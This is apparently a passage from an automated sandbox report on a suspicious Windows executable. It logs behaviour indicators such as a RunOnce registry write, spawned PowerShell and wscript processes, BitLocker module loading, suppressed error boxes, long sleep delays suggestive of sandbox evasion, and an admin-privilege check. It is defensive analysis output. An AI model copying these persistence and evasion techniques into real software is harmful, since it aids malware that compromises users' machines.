        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1802Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1579Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5102Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4558Jump to behavior
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2596
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5696Thread sleep count: 5102 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep count: 4558 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4368Thread sleep time: -12912720851596678s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F2034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF7E74F2034
        Source: C:\Users\user\Desktop\00wVZ1NU5b.exeCode function: 0_2_00007FF7E74F6710 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF7E74F6710
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AB042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000007.00000002.2175735528.00000218AC563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
